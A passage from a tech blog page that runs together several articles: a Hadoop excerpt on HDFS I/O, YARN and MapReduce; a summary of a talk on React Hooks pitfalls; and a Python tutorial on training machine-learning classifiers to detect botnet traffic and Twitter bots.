The Name Node is responsible for managing the metadata of the HDFS cluster, such as the list of files and folders that exist in the cluster, the number of splits each file is divided into, and their replication and storage at different Data Nodes. It also maintains and manages the namespace and file permissions of all the files available in the HDFS cluster. Apart from bookkeeping, the Name Node also has a supervisory role: it keeps a watch on the replication factor of all the files, and if some block goes missing, it issues commands to replicate the missing block of data. It also generates reports to ascertain cluster health. It is important to note that all the communication for supervisory tasks happens from Data Node to Name Node; that is, a Data Node sends reports (also known as block reports) to the Name Node, and it is then that the Name Node responds by issuing different commands or instructions as the need may be.

HDFS I/O

An HDFS read operation from a client involves:

1. The client requests the NameNode to determine where the actual data blocks are stored for a given file.
2. The Name Node obliges by providing the block IDs and the locations of the hosts (Data Nodes) where the data can be found.
3. The client contacts the Data Nodes with the respective block IDs to fetch the data, while preserving the order of the block files.

An HDFS write operation from a client involves:

1. The client contacts the Name Node to update the namespace with the file name and verify the necessary permissions.
2. If the file exists, the Name Node throws an error; otherwise, it returns the client an FSDataOutputStream, which points to the data queue.
3. The data queue negotiates with the NameNode to allocate new blocks on suitable DataNodes.
4. The data is then copied to that DataNode, and, as per the replication strategy, the data is further copied from that DataNode to the rest of the DataNodes.

It's important to note that the data is never moved through the NameNode, as that would cause a performance bottleneck.
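From the client's point of view, both of these paths are hidden behind Hadoop's FileSystem API. The following is a minimal sketch of that client-side view; the path and file contents are illustrative, and it assumes a core-site.xml with fs.defaultFS is available on the classpath:

    import java.nio.charset.StandardCharsets;
    import org.apache.hadoop.conf.Configuration;
    import org.apache.hadoop.fs.FSDataInputStream;
    import org.apache.hadoop.fs.FSDataOutputStream;
    import org.apache.hadoop.fs.FileSystem;
    import org.apache.hadoop.fs.Path;
    import org.apache.hadoop.io.IOUtils;

    public class HdfsIoDemo {
        public static void main(String[] args) throws Exception {
            // Picks up fs.defaultFS (and other settings) from the config files on the classpath.
            Configuration conf = new Configuration();
            FileSystem fs = FileSystem.get(conf);

            Path file = new Path("/tmp/hdfs-io-demo.txt"); // illustrative path

            // Write: the client receives an FSDataOutputStream; block allocation and
            // replication are negotiated with the NameNode behind the scenes.
            try (FSDataOutputStream out = fs.create(file, true)) {
                out.write("hello hdfs".getBytes(StandardCharsets.UTF_8));
            }

            // Read: the NameNode supplies the block locations, and the client then
            // streams the blocks directly from the DataNodes.
            try (FSDataInputStream in = fs.open(file)) {
                IOUtils.copyBytes(in, System.out, 4096, false);
            }
        }
    }

Behind fs.create() and fs.open(), the block allocation, replication, and block-location lookups described above are handled with the NameNode, while the actual bytes flow directly to and from the DataNodes.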
YARN

The simplest way to understand Yet Another Resource Negotiator (YARN) is to think of it as an operating system for a cluster: provisioning resources, scheduling jobs, and handling node maintenance. With Hadoop 2.x, the MapReduce model of processing the data and managing the cluster (job tracker/task tracker) was divided. While data processing was still left to MapReduce, the cluster's resource allocation (or rather, scheduling) task was assigned to a new component called YARN. Another objective that YARN met was that it made MapReduce just one of the techniques to process data, rather than the only technology able to process data on HDFS, as was the case in Hadoop 1.x systems. This paradigm shift opened the flood gates for the development of interesting applications around Hadoop, and a new ecosystem beyond the classical MapReduce processing system evolved. It didn't take much time after that for Apache Spark to break the hegemony of classical MapReduce and become arguably the most popular processing framework for parallel computing, as far as active development and adoption are concerned. In order to provide multi-tenancy, fault tolerance, and resource isolation, YARN has the following components to manage the cluster seamlessly.

ResourceManager

The ResourceManager (RM) negotiates resources for different compute programmes on a Hadoop cluster while guaranteeing resource isolation, data locality, fault tolerance, task prioritization, and effective cluster capacity utilization. A configurable scheduler gives the ResourceManager the flexibility to schedule and prioritize different applications as per need.

Tasks served by the RM while serving clients: Using a client or APIs, a user can submit or terminate an application. The user can also gather statistics on submitted applications and on cluster and queue information. The RM also prioritizes ADMIN tasks over any other task, to perform clean-up or maintenance activities on the cluster, such as refreshing the node list or the queue configuration.

Tasks served by the RM while serving cluster nodes: Provisioning and de-provisioning of new nodes is an important task of the RM. Each node sends a heartbeat at a configured interval; if no heartbeat arrives within the configured limit, the default being 10 minutes, the node is treated as dead. As a clean-up activity, all the processes supposedly running on it, including containers, are marked dead too.

Tasks served by the RM while serving the Application Master: The RM registers new AMs and terminates the successfully executed ones. Just as with cluster nodes, if the heartbeat of an AM is not received within a preconfigured duration, the default value being 10 minutes, the AM is marked dead and all its associated containers are marked dead too. But since YARN is reliable as far as application execution is concerned, a new AM is rescheduled to try another execution on a new container, until it reaches the retry count, configurable with a default of 4.

Scheduling and other miscellaneous tasks served by the RM: The RM maintains a list of running, submitted, and executed applications along with their statistics, such as execution time, status, and so on. The privileges of users as well as of applications are maintained and checked while serving various requests across the application life cycle. The RM scheduler oversees resource allocation for applications, such as memory allocation. Two common scheduling algorithms used in YARN are fair scheduling and capacity scheduling.

NodeManager

A NodeManager (NM) exists on each node of the cluster, in a fashion somewhat similar to the slave nodes in a master-slave architecture.
When an NM starts, it sends information to the RM about its availability to share its resources for upcoming jobs. From then on, the NM sends periodic signals, also called heartbeats, to the RM, informing it of its status as being alive in the cluster. Primarily, the NM is responsible for launching containers that have been requested by an AM with certain resource requirements, such as memory, disk, and so on. Once the containers are up and running, the NM keeps a watch not on the status of the container's task but on the resource utilization of the container, and kills it if the container starts utilizing more resources than it has been provisioned for. Apart from managing the life cycle of containers, the NM also keeps the RM informed about the node's health.

ApplicationMaster

An AM gets launched per submitted application and manages the life cycle of that application. The first and foremost task the AM does is to negotiate resources from the RM to launch task-specific containers on different nodes. Once containers are launched, the AM keeps track of the status of all the containers' tasks. If any node goes down or a container gets killed because of using excess resources (or otherwise), the AM renegotiates resources from the RM and launches those pending tasks again. The AM also reports the status of the submitted application directly to the user and other statistics to the RM. The ApplicationMaster implementation is framework specific, and it is because of this that application/framework-specific code is transferred to the AM, and it is the AM that distributes it further across the cluster. This important feature also makes YARN technology-agnostic, as any framework can implement its own ApplicationMaster and then utilize the resources of a YARN cluster seamlessly.

Container

A container, in an abstract sense, is a set of minimal resources, such as CPU, RAM, disk I/O, disk space, and so on, that are required to run a task independently on a node. The first container after submitting the job is launched by the RM to host the ApplicationMaster. It is the AM which then negotiates resources from the RM in the form of containers, which then get hosted on different nodes across the Hadoop cluster.

Process flow of application submission in YARN

Step 1: Using a client or APIs, the user submits the application, let's say a Spark job JAR. The ResourceManager, whose primary task is to gather and report all the applications running on the entire Hadoop cluster and the available resources on the respective Hadoop nodes, accepts the newly submitted task, depending on the privileges of the user submitting the job.

Step 2: After this, the RM delegates the task to its scheduler. The scheduler then searches for a container which can host the application-specific Application Master. While the scheduler does take into consideration parameters like availability of resources, task priority, data locality, and so on before scheduling or launching an Application Master, it has no role in monitoring or restarting a failed job. It is the responsibility of the RM to keep track of an AM and restart it in a new container if it fails.

Step 3: Once the Application Master gets launched, it becomes the prerogative of the AM to oversee the resource negotiation with the RM for launching task-specific containers. Negotiation with the RM is typically over:

- The priority of the tasks at hand.
- The number of containers to be launched to complete the tasks.
- The resources needed to execute the tasks, i.e. RAM, CPU (since Hadoop 3.x).
- Available nodes where job containers can be launched with the required resources.

Depending on the priority and availability of resources, the RM grants containers, represented by a container ID and the hostname of the node on which each can be launched.

Step 4: The AM then requests the NMs of the respective hosts to launch the containers with the specific IDs and resource configuration. The NM then launches the containers but keeps a watch on the resource usage of each task. If, for example, a container starts utilizing more resources than it has been provisioned for, that container is killed by the NM. This greatly improves the job isolation and the fair sharing of resources that YARN guarantees, as otherwise it would have impacted the execution of other containers. However, it is important to note that the job status and application status as a whole are managed by the AM. It falls in the domain of the AM to continuously monitor any delayed or dead containers, simultaneously negotiating with the RM to launch new containers to reassign the tasks of dead containers.

Step 5: The containers executing on different nodes send application-specific statistics to the AM at specific intervals.

Step 6: The AM also reports the status of the application directly to the client that submitted the specific application, in our case a Spark job.

Step 7: The NM monitors the resources being utilized by all the containers on its node and keeps sending periodic updates to the RM.

Step 8: The AM sends periodic statistics, such as application status, task failures, and log information, to the RM.

Overview of MapReduce

Before delving deep into the MapReduce implementation in Hadoop, let's first understand MapReduce as a concept in parallel computing and why it is a preferred way of computing. MapReduce comprises two mutually exclusive but dependent phases, each capable of running on two different machines or nodes:

Map: In the Map phase, the transformation of data takes place. It splits the data into key-value pairs by splitting it on a keyword. Suppose we have a text file and we want to do an analysis such as counting the total number of words, or even the frequency with which each word has occurred in the text file. This is the classical word count problem of MapReduce. To address this problem, first we have to identify the splitting keyword so that the data can be split and converted into key-value pairs. Let's begin with John Lennon's song Imagine.

Sample text:

    Imagine there's no heaven
    It's easy if you try
    No hell below us
    Above us only sky
    Imagine all the people living for today

After running the Map phase on the sampled text and splitting it over <space>, it will get converted to key-value pairs as follows:

    [<imagine, 1> <there's, 1> <no, 1> <heaven, 1> <it's, 1> <easy, 1> <if, 1> <you, 1> <try, 1> <no, 1> <hell, 1> <below, 1> <us, 1> <above, 1> <us, 1> <only, 1> <sky, 1> <imagine, 1> <all, 1> <the, 1> <people, 1> <living, 1> <for, 1> <today, 1>]

The key here represents the word and the value represents the count. Also note that we have converted all the keys to lowercase to reduce any further complexity arising out of matching case-sensitive keys.

Reduce: The Reduce phase deals with the aggregation of the Map phase's result, and hence all the key-value pairs are aggregated over the key.
Applied to our sample text, the Map output gets aggregated as follows:

[<imagine, 2> <there's, 1> <no, 2> <heaven, 1> <it's, 1> <easy, 1> <if, 1> <you, 1> <try, 1> <hell, 1> <below, 1> <us, 2> <above, 1> <only, 1> <sky, 1> <all, 1> <the, 1> <people, 1> <living, 1> <for, 1> <today, 1>]

As we can see, the Map and Reduce phases can run independently of each other and hence can use separate nodes in the cluster to process the data. This approach of separating work into smaller units called Map and Reduce has revolutionized general-purpose distributed/parallel computing, and it is what we now know as MapReduce. Apache Hadoop's MapReduce is implemented much as discussed, except for extra features governing how the data from the Map phase on each node gets transferred to its designated Reduce phase node. Hadoop's implementation enriches the Map and Reduce phases by adding a few more concrete steps in between to make the framework fault tolerant and truly distributed. We can describe MR jobs on YARN in five stages.

Job submission stage: When a client submits an MR job, the following things happen: the RM is asked for an application ID; the input data location is checked and, if present, the file split sizes are computed; and the job's output location is checked, which must not already exist. If all three conditions are satisfied, the MR job JAR, along with its configuration and the details of the input splits, is copied to HDFS in a directory named after the application ID provided by the RM. The job is then submitted to the RM to launch a job-specific ApplicationMaster, MRAppMaster.

Map stage: Once the RM receives the client's request to launch MRAppMaster, a call is made to the YARN scheduler to assign a container. Subject to resource availability, the container is granted and MRAppMaster is launched on the designated node with the provisioned resources. MRAppMaster then fetches the input split information from the HDFS path submitted by the client and computes the number of Mapper tasks to launch based on the splits. Depending on the number of Mappers, it also calculates the required number of Reducers as per the configuration. If MRAppMaster finds that the number of Mappers and Reducers and the size of the input files are small enough to run in the same JVM, it goes ahead and does so; such a job is called an Uber task. In other scenarios, MRAppMaster negotiates container resources from the RM for running these tasks, with Mapper tasks given higher priority, since Mapper tasks must finish before the sorting phase can start. Data locality is another concern for containers hosting Mappers: data-local nodes are preferred over rack-local ones, with the least preference given to data hosted on remote nodes. For the Reduce phase, no such data-locality preference exists. Containers hosting the Mapper function first copy the MapReduce JAR and configuration files locally and then launch a YarnChild class in the JVM. The Mapper then starts reading the input files, processes them into key-value pairs, and writes them to a circular buffer.

Shuffle and sort phase: Because the circular buffer has a size constraint, once it fills past a certain percentage (80 by default), a thread is spawned that spills the data from the buffer. Before the spilled data is copied to disk, it is first partitioned with respect to its Reducer; the background thread then sorts the partitioned data by key and, if a combiner is configured, combines the data too. This optimizes the data by the time it is copied to its respective partition on disk.
This process continues until all the data from the circular buffer has been written to disk. A background thread then checks whether the number of spilled files in each partition is within the range of a configurable parameter; if not, the files are merged, and the combiner is run over them, until the count falls within that limit. A Map task keeps updating its status to the ApplicationMaster throughout its life cycle, and it is only once 5 percent of the Map tasks have completed that the Reduce tasks start. An auxiliary service in the NodeManager serving the Reduce task starts a Netty web server that asks MRAppMaster for the Mapper hosts holding the relevant partitioned files. All the partitioned files that pertain to a Reducer are copied to its node in a similar fashion. Since multiple files get copied as the data destined for a reduce node is collected from various nodes, a background thread merges the sorted map files, sorts them again and, if a combiner is configured, combines the result too.

Reduce stage: It is important to note that at this stage every input file for each Reducer should already be sorted by key; this is the presumption with which the Reducer starts processing the records and converting the key-value pairs into an aggregated list. Once the Reducer has processed the data, it writes the output to the folder specified during job submission.

Clean-up stage: Each Reducer sends periodic updates to MRAppMaster about task completion. Once the Reduce tasks are over, the ApplicationMaster starts the clean-up activity: the submitted job's status is changed from running to successful, all the temporary and intermediate files and folders are deleted, and the application statistics are archived to the job history server.

Summary

In this article, we looked at HDFS and YARN along with MapReduce, covering the different functions of MapReduce and HDFS I/O.

Resources for Article:

Further resources on this subject: Getting Started with Apache Spark DataFrames [article] Five common questions for .NET/Java developers learning JavaScript and Node.js [article] Getting Started with Apache Hadoop and Apache Spark [article]

5 pitfalls of React Hooks you should avoid - Kent C. Dodds

Sugandha Lahoti
09 Sep 2019
7 min read
The React community first introduced Hooks, back in October 2018 as a JavaScript function to allow using React without classes. The idea was simple - With the help of Hooks, you will be able to “hook into” or use React state and other React features from function components. In February, React 16.8 released with the stable implementation of Hooks. As much as Hooks are popular, there are certain pitfalls which developers should avoid when they are learning and adopting React Hooks. In his talk, “React Hook Pitfalls” at React Rally 2019 (August 22-23 2019), Kent C. Dodds talks about 5 common pitfalls of React Hooks and how to avoid/fix them. Kent is a world renowned speaker, maintainer and contributor of hundreds of popular npm packages. He's actively involved in the open source community of React and general JavaScript ecosystem. He’s also the creator of react-testing-library which provides simple and complete React DOM testing utilities that encourage good testing practices. Tl;dr Problem: Starting without a good foundation Solution: Read the React Hooks docs and the FAQ Problem: Not using (or ignoring) the ESLint plugin Solution: Install, use, and follow the ESLint plugin Problem: Thinking in Lifecycles Solution: Don't think about Lifecycles, think about synchronizing side effects to state Problem: Overthinking performance Solution: React is fast by default and so research before applying performance optimizations pre-maturely Problem: Overthinking the testing of React hooks Solution: Avoid testing ‘implementation details’ of the component. Pitfall #1 Starting without a good foundation Often React developers begin coding without reading the documentation and that leads to a number of issues and small problems. Kent recommends developers to start by reading the React Hooks documentation and the FAQ section thoroughly. He jokingly adds, “Once you read the frequently asked questions, you can ask the infrequently asked questions. And then maybe those will get in the docs, too. In fact, you can make a pull request and put it in yourself.” Pitfall #2: Not using or (ignoring) the ESLint plugin The ESLint plugin is the official plugin built by the React team. It has two rules: "rules of hooks" and "exhaustive deps." The default recommended configuration of these rules is to set "rules of hooks" to an error, and the "exhaustive deps" to a warning. The linter plugin enforces these rules automatically. The two “Rules of Hooks” are: Don’t call Hooks inside loops, conditions, or nested functions Instead, always use Hooks at the top level of your React function. By following this rule, you ensure that Hooks are called in the same order each time a component renders. Only Call Hooks from React Functions Don’t call Hooks from regular JavaScript functions. Instead, you can either call Hooks from React function components or call them from custom Hooks. Kent agrees that sometimes the rule is incapable of performing static analysis on your code properly due to limitations of ESLint. “I believe”, he says, “ this is why it's recommended to set the exhaustive deps rule to "warn" instead of "error." When this happens, the plugin will tell you so in the warning. He recommends  developers should restructure their code to avoid that warning. The solution Kent offers for this pitfall is to Install, follow, and use the ESLint plugin. The ESLint plugin, he says will not only catch easily missable bugs, but it will also teach you things about your code and hooks in the process. 
Pitfall #3: Thinking in Lifecycles In Hooks the components are declarative. Kent says that this feature allows you to stop thinking about "when things should happen in the lifecycle of the component" (which doesn't matter that much) and more about "when things should happen in relation to state changes" (which matters much more.) With React Hooks, he adds, you're not thinking about component Lifecycles, instead you're thinking about synchronizing the state of the side-effects with the state of the application. This idea is difficult for React developers to grasp initially, however once you do it, he adds, you will naturally experience fewer bugs in your apps thanks to the design of the API. https://twitter.com/ryanflorence/status/1125041041063665666 Solution: Think about synchronizing side effects to state, rather than lifecycle methods. Pitfall #4: Overthinking performance Kent says that even though it's really important to be considerate of performance, you should also think about your code complexity. If your code is complex, you can't give people the great features they're looking for, as you will be spending all your time, dealing with the complexity of your code. He adds, "unnecessary re-renders" are not necessarily bad for performance. Just because a component re-renders, doesn't mean the DOM will get updated (updating the DOM can be slow). React does a great job at optimizing itself; it’s fast by default. For this, he mentions. “If your app's unnecessary re-renders are causing your app to be slow, first investigate why renders are slow. If rendering your app is so slow that a few extra re-renders produces a noticeable slow-down, then you'll likely still have performance problems when you hit "necessary re-renders." Once you fix what's making the render slow, you may find that unnecessary re-renders aren't causing problems for you anymore.” If still unnecessary re-renders are causing you performance problems, then you can unpack the built-in performance optimization APIs like React.memo, React.useMemo, and React.useCallback. More information on this on Kent’s blogpost on useMemo and useCallback. Solution: React is fast by default and so research before applying performance optimizations pre-maturely; profile your app and then optimize it. Pitfall #5: Overthinking the testing of React Hooks Kent says, that people are often concerned that they need to rewrite their tests along with all of their components when they refactor to hooks from class components. He explains, “Whether your component is implemented via Hooks or as a class, it is an implementation detail of the component. Therefore, if your test is written in such a way that reveals that, then refactoring your component to hooks will naturally cause your test to break.” He adds, “But the end-user doesn't care about whether your components are written with hooks or classes. They just care about being able to interact with what those components render to the screen. So if your tests interact with what's being rendered, then it doesn't matter how that stuff gets rendered to the screen, it'll all work whether you're using classes or hooks.” So, to avoid this pitfall, Kent’s recommendation is that you write tests that will work irrespective of whether you're using classes or hook. Before you upgrade to Hooks, start writing your tests free of implementation detail and your refactored hooks can be validated by the tests that you've written for your classes. 
The more your tests resemble the way your software is used, the more confidence they can give you. In review: Read the docs and the FAQ. Install, use and follow the ESLint plugin. Think about synchronizing side effects to state. Profile your app and then optimize it. Avoid testing implementation details. Watch the full talk on YouTube. https://www.youtube.com/watch?v=VIRcX2X7EUk Read more about React #Reactgate forces React leaders to confront community’s toxic culture head on React.js: why you should learn the front end JavaScript library and how to get started Ionic React RC is now out!


Build botnet detectors using machine learning algorithms in Python [Tutorial]

Melisha Dsouza
26 Aug 2018
12 min read
Botnets are connected computers that perform a number of repetitive tasks to keep websites going. Connected devices play an important role in modern life. From smart home appliances, computers, coffee machines, and cameras, to connected cars, this huge shift in our lifestyles has made our lives easier. Unfortunately, these exposed devices could be easily targeted by attackers and cybercriminals who could use them later to enable larger-scale attacks. Security vendors provide many solutions and products to defend against botnets, but in this tutorial, we are going to learn how to build novel botnet detection systems with Python and machine learning techniques. You will find all the code discussed, in addition to some other useful scripts, in the following repository: https://github.com/PacktPublishing/Mastering-Machine-Learning-for-Penetration-Testing/tree/master/Chapter05 This article is an excerpt from a book written by Chiheb Chebbi titled Mastering Machine Learning for Penetration Testing We are going to learn how to build different botnet detection systems with many machine learning algorithms. As a start to a first practical lab, let's start by building a machine learning-based botnet detector using different classifiers. By now, I hope you have acquired a clear understanding about the major steps of building machine learning systems. So, I believe that you already know that, as a first step, we need to look for a dataset. Many educational institutions and organizations are given a set of collected datasets from internal laboratories. One of the most well known botnet datasets is called the CTU-13 dataset. It is a labeled dataset with botnet, normal, and background traffic delivered by CTU University, Czech Republic. During their work, they tried to capture real botnet traffic mixed with normal traffic and background traffic. To download the dataset and check out more information about it, you can visit the following link: https://mcfp.weebly.com/the-ctu-13-dataset-a-labeled-dataset-with-botnet-normal-and-background-traffic.html. The dataset is bidirectional NetFlow files. But what are bidirectional NetFlow files? Netflow is an internet protocol developed by Cisco. The goal of this protocol is to collect IP traffic information and monitor network traffic in order to have a clearer view about the network traffic flow. The main components of a NetFlow architecture are a NetFlow Exporter, a Netflow collector, and a Flow Storage. The following diagram illustrates the different components of a NetFlow infrastructure: When it comes to NetFlow generally, when host A sends an information to host B and from host B to host A as a reply, the operation is named unidirectional NetFlow. The sending and the reply are considered different operations. In bidirectional NetFlow, we consider the flows from host A and host B as one flow. Let's download the dataset by using the following command: $ wget --no-check-certificate https://mcfp.felk.cvut.cz/publicDatasets/CTU-13-Dataset/CTU-13-Dataset.tar.bz2 Extract the downloaded tar.bz2 file by using the following command: # tar xvjf CTU-13-Dataset.tar.bz2 The file contains all the datasets, with the different scenarios. For the demonstration, we are going to use dataset 8 (scenario 8). 
You can select any scenario or you can use your own collected data, or any other .binetflow files delivered by other institutions: Load the data using pandas as usual: >>> import pandas as pd >>> data = pd.read_csv("capture20110816-3.binetflow") >>> data['Label'] = data.Label.str.contains("Botnet") Exploring the data is essential in any data-centric project. For example, you can start by checking the names of the features or the columns: >> data.columns The command results in the columns of the dataset: StartTime, Dur, Proto, SrcAddr, Sport, Dir, DstAddr, Dport, State, sTos, dTos, TotPkts, TotBytes, SrcBytes, and Label. The columns represent the features used in the dataset; for example, Dur represents duration, Sport represents the source port, and so on. You can find the full list of features in the chapter's GitHub repository. Before training the model, we need to build some scripts to prepare the data. This time, we are going to build a separate Python script to prepare data, and later we can just import it into the main script. I will call the first script DataPreparation.py. There are many proposals done to help extract the features and prepare data to build botnet detectors using machine learning. In our case, I customized two new scripts inspired by the data loading scripts built by NagabhushanS: from __future__ import division import os, sys import threading After importing the required Python packages, we created a class called Prepare to select training and testing data: class Prepare(threading.Thread): def __init__(self, X, Y, XT, YT, accLabel=None): threading.Thread.__init__(self) self.X = X self.Y = Y self.XT=XT self.YT=YT self.accLabel= accLabel def run(self): X = np.zeros(self.X.shape) Y = np.zeros(self.Y.shape) XT = np.zeros(self.XT.shape) YT = np.zeros(self.YT.shape) np.copyto(X, self.X) np.copyto(Y, self.Y) np.copyto(XT, self.XT) np.copyto(YT, self.YT) for i in range(9): X[:, i] = (X[:, i] - X[:, i].mean()) / (X[:, i].std()) for i in range(9): XT[:, i] = (XT[:, i] - XT[:, i].mean()) / (XT[:, i].std()) The second script is called LoadData.py. You can find it on GitHub and use it directly in your projects to load data from .binetflow files and generate a pickle file. Let's use what we developed previously to train the models. After building the data loader and preparing the machine learning algorithms that we are going to use, it is time to train and test the models. First, load the data from the pickle file, which is why we need to import the pickle Python library. Don't forget to import the previous scripts using: import LoadData import DataPreparation import pickle file = open('flowdata.pickle', 'rb') data = pickle.load(file) Select the data sections: Xdata = data[0] Ydata = data[1] XdataT = data[2] YdataT = data[3] As machine learning classifiers, we are going to try many different algorithms so later we can select the best algorithm for our model. Import the required modules to use four machine learning algorithms from sklearn: from sklearn.linear_model import * from sklearn.tree import * from sklearn.naive_bayes import * from sklearn.neighbors import * Prepare the data by using the previous module build. Don't forget to import DataPreparation by typing import DataPreparation: >>> DataPreparation.Prepare(Xdata,Ydata,XdataT,YdataT) Now, we can train the models; and to do that, we are going to train the model with different techniques so later we can select the most suitable machine learning technique for our project. 
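Since every classifier in the next step follows the same fit/predict/score pattern, it can be convenient to compare them in a single loop as well. The following is a minimal sketch, assuming the Xdata, Ydata, XdataT, and YdataT arrays prepared above; the walkthrough that follows shows the same steps one classifier at a time:

from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier

# Candidate models, keyed by a readable name.
classifiers = {
    "Decision Tree": DecisionTreeClassifier(),
    "Logistic Regression": LogisticRegression(C=10000),
    "Gaussian Naive Bayes": GaussianNB(),
    "k-Nearest Neighbors": KNeighborsClassifier(),
}

for name, clf in classifiers.items():
    clf.fit(Xdata, Ydata)              # train on the training split
    score = clf.score(XdataT, YdataT)  # accuracy on the test split
    print("The score of the %s classifier is %.2f" % (name, score * 100))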
The steps are like what we learned in previous projects: after preparing the data and selecting the features, define the machine learning algorithm, fit the model, and print out the score after defining its variable. As machine learning classifiers, we are going to test many of them. Let's start with a decision tree: Decision tree model: >>> clf = DecisionTreeClassifier() >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print (“The Score of the Decision Tree Classifier is”, Score * 100) The score of the decision tree classifier is 99% Logistic regression model: >>> clf = LogisticRegression(C=10000) >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print ("The Score of the Logistic Regression Classifier is", Score * 100) The score of the logistic regression classifier is 96% Gaussian Naive Bayes model: >>> clf = GaussianNB() >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print("The Score of the Gaussian Naive Bayes classifier is", Score * 100) The score of the Gaussian Naive Bayes classifier is 72% k-Nearest Neighbors model: >>> clf = KNeighborsClassifier() >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print("The Score of the K-Nearest Neighbours classifier is", Score * 100) The score of the k-Nearest Neighbors classifier is 96% Neural network model: To build a Neural network Model use the following code: >>> from keras.models import * >>> from keras.layers import Dense, Activation >>> from keras.optimizers import * model = Sequential() model.add(Dense(10, input_dim=9, activation="sigmoid")) model.add(Dense(10, activation='sigmoid')) model.add(Dense(1)) sgd = SGD(lr=0.01, decay=0.000001, momentum=0.9, nesterov=True) model.compile(optimizer=sgd, loss='mse') model.fit(Xdata, Ydata, nb_epoch=200, batch_size=100) Score = model.evaluate(XdataT, YdataT, verbose=0) Print(“The Score of the Neural Network is”, Score * 100 ) With this code, we imported the required Keras modules, we built the layers, we compiled the model with an SGD optimizer, we fit the model, and we printed out the score of the model. How to build a Twitter bot detector In the previous sections, we saw how to build a machine learning-based botnet detector. In this new project, we are going to deal with a different problem instead of defending against botnet malware. We are going to detect Twitter bots because they are also dangerous and can perform malicious actions. For the model, we are going to use the NYU Tandon Spring 2017 Machine Learning Competition: Twitter Bot classification dataset. You can download it from this link: https://www.kaggle.com/c/twitter-bot-classification/data. Import the required Python packages: >>> import pandas as pd >>> import numpy as np >>> import seaborn Let's load the data using pandas and highlight the bot and non-bot data: >>> data = pd.read_csv('training_data_2_csv_UTF.csv') >>> Bots = data[data.bot==1] >> NonBots = data[data.bot==0] Visualization with seaborn In every project, I want to help you discover new data visualization Python libraries because, as you saw, data engineering and visualization are essential to every modern data-centric project. This time, I chose seaborn to visualize the data and explore it before starting the training phase. Seaborn is a Python library for making statistical visualizations. 
The following is an example of generating a plot with seaborn: >>> data = np.random.multivariate_normal([0, 0], [[5, 2], [2, 2]], size=2000) >>> data = pd.DataFrame(data, columns=['x', 'y']) >>> for col in 'xy': ... seaborn.kdeplot(data[col], shade=True) For example, in our case, if we want to identify the missing data: matplotlib.pyplot.figure(figsize=(10,6)) seaborn.heatmap(data.isnull(), yticklabels=False, cbar=False, cmap='viridis') matplotlib.pyplot.tight_layout() The previous two code snippets were some examples to learn how to visualize data. Visualization helps data scientists to explore and learn more about the data. Now, let's go back and continue building our model. Identify the bag of words by selecting some bad words used by Twitter bots. The following is an example of bad words used by a bot. Of course, you can add more words: bag_of_words_bot = r'bot|b0t|cannabis|tweet me|mishear|follow me|updates every|gorilla|yes_ofc|forget' \ r'expos|kill|bbb|truthe|fake|anony|free|virus|funky|RNA|jargon' \ r'nerd|swag|jack|chick|prison|paper|pokem|xx|freak|ffd|dunia|clone|genie|bbb' \ r'ffd|onlyman|emoji|joke|troll|droop|free|every|wow|cheese|yeah|bio|magic|wizard|face' Now, it is time to identify training features: data['screen_name_binary'] = data.screen_name.str.contains(bag_of_words_bot, case=False, na=False) data['name_binary'] = data.name.str.contains(bag_of_words_bot, case=False, na=False) data['description_binary'] = data.description.str.contains(bag_of_words_bot, case=False, na=False) data['status_binary'] = data.status.str.contains(bag_of_words_bot, case=False, na=False) Feature extraction: Let's select features to use in our model: data['listed_count_binary'] = (data.listed_count>20000)==False features = ['screen_name_binary', 'name_binary', 'description_binary', 'status_binary', 'verified', 'followers_count', 'friends_count', 'statuses_count', 'listed_count_binary', 'bot'] Now, train the model with a decision tree classifier: from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, roc_curve, auc from sklearn.model_selection import train_test_split We import some previously discussed modules: X = data[features].iloc[:,:-1] y = data[features].iloc[:,-1] We define the classifier: clf = DecisionTreeClassifier(criterion='entropy', min_samples_leaf=50, min_samples_split=10) We split the classifier: X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=101) We fit the model: clf.fit(X_train, y_train) y_pred_train = clf.predict(X_train) y_pred_test = clf.predict(X_test) We print out the accuracy scores: print("Training Accuracy: %.5f" %accuracy_score(y_train, y_pred_train)) print("Test Accuracy: %.5f" %accuracy_score(y_test, y_pred_test)) Our model detects Twitter bots with an 88% detection rate, which is a good accuracy rate. This technique is not the only possible way to detect botnets. Researchers have proposed many other models based on different machine learning algorithms, such as Linear SVM and decision trees. All these techniques have an accuracy of 90%. Most studies showed that feature engineering was a key contributor to improving machine learning models. To study a real-world case, check out a paper called What we learn from learning - Understanding capabilities and limitations of machine learning in botnet attacks (https://arxiv.org/pdf/1805.01333.pdf), conducted by David Santana, Shan Suthaharan, and Somya Mohanty. 
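Accuracy alone can hide how a classifier behaves on the minority (bot) class, so it is also worth printing per-class precision and recall. Here is a small optional sketch, assuming the clf, X_test, y_test, and y_pred_test objects created in the previous steps; classification_report and confusion_matrix are standard scikit-learn utilities:

from sklearn.metrics import classification_report, confusion_matrix

# y_pred_test was produced by clf.predict(X_test) in the previous step.
print(confusion_matrix(y_test, y_pred_test))   # rows: actual, columns: predicted
print(classification_report(y_test, y_pred_test,
                            target_names=["non-bot", "bot"]))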
Summary

In this tutorial, we learned how to build a botnet detector and a Twitter bot detector with different machine learning algorithms. To become a master at penetration testing using machine learning with Python, check out the book Mastering Machine Learning for Penetration Testing.

Cisco and Huawei Routers hacked via backdoor attacks and botnets
How to protect yourself from a botnet attack
Tackle trolls with Machine Learning bots: Filtering out inappropriate content just got easy


Pentesting Using Python

Packt
04 Feb 2015
22 min read
